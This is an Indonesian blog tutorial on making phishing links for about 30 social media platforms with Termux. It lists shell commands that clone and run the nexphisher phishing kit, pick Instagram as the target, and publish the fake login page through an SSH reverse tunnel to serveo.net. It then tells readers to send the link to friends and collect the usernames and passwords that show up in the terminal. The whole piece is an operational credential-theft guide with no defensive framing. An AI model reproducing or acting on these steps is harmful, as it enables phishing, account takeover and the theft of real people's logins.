Cara membuat link phissing semua medsos via termux

Assalamualaikum wr wb

Kali ini saya akan menjelaskan tentang cara membuat link phissing menggunakan termux tanpa harus meembuat domain.


Script yang akan saya gunakan bukan sekedar script, banyak kelebihan² nya, seperti dapat membuat link phissing hingga 30 media sosial yang berbeda.


Bahan yang perlu kalian gunakan yaitu Termux dan tentunya command/perintah.


Jika kalian belum mendownload aplikasi termux, saya sarankan kalian membuka tautan artikel yang saya buat, karena termux yang saya berikan di artikel tersebut termux yang berbeda dari yang ada playstore, kalian dapat mengunduhnya di sini:


Kalau kalian sudah mengunduh nya, maka kalian dapat langsung menjalankan aplikasi termuxnya.


Kalian masukkan command/perintah yang saya tulis dibawah, kalian salin lalu tempel 1 per 1, jangan ada yang terlewat, kalian masukkan seperti ini:

  • pkg update && pkg upgrade -y

  • pkg install bash -y

  • pkg install git -y

  • git clone https://github.com/htr-tech/nexphisher

  • bash tmux_setup

  • bash nexphisher

Jika berhasil maka tampilannya akan menjadi seperti ini:


Setelah tampilannya berubah seperti di atas, kalian bisa memilih, ingin membuat link phissing untuk medsos apa, ada 30 pilihan medsos, saya contohkan memilih Instagram, masukan aja angka 2, lalu enter.


Maka tampilannya akan berubah seperti dibawah:


Lalu kalian di hadapkan 3 pilihan, kalian pilih sendiri, dan saya contohkan memilih nomer 1, maka tampilannya akan menjadi seperti ini:



Jika tampilannya menjadi seperti di atas, kalian dapat memilih salah satu nya, dan saya sarankan kalian memilih nomer 3 yaitu serveo. 


Maka kalian akan di suruh mengisi port, dan kalian isi saja dengan angka 8888



Selanjutnya akan muncul tampilan seperti ini, kalian ikuti apa yang ada di hp ku dibawah ini:



,Setelah itu tunggu hingga tampilannya akan menjadi seperti ini:



Jika tampilannya berubah seperti di atas, maka sudah berhasil. 


Langkah selanjutnya, kalian buka new session/kalian dapat menggeser kekanan aplikasi termuxnya, lalu tekan pilihan new session.


Setelah kalian tambah session, ketikkan pada termux tadi seperti dibawah:

  • pkg install openssh

  • ssh -R 80:localhost:8888 serveo.net


Setelah itu, akan muncul tampilan seperti dibawah ini:



Setelah tampilannya menjadi seperti di atas, kalian cukup salin saja tautan yang warna hijau, yang di mulai dari kata https:.....


Setelah itu tinggal kalian share keteman kalian, tunggu hingga mereka masuk dan mengisikan username dan password di phissing kalian.


Ini tampilan phissing nya:


Setelah teman kalian memasukkan username dan password di link phissing yang kalian kirimkan tadi, maka akan muncul seperti ini pada layar termux kalian:


Dan berhasil....


Jika kalian memiliki pertanyaan, dapat langsung menanyakan pada kolom komentar, atau langsung bertanya kepada saya pada kolom contact pada artikel ini.


Sekian informasi dari saya, semoga bermanfaat dan jangan lupa untuk share artikel ini ya, supaga orang lain juga dapat pengetahuan.


Terimakasih











D3PAK

Hallo pembaca setia artikel ini, saya sangat berterimakasih atas partisipasi anda semua, thanks for support and everything

Posting Komentar

Lebih baru Lebih lama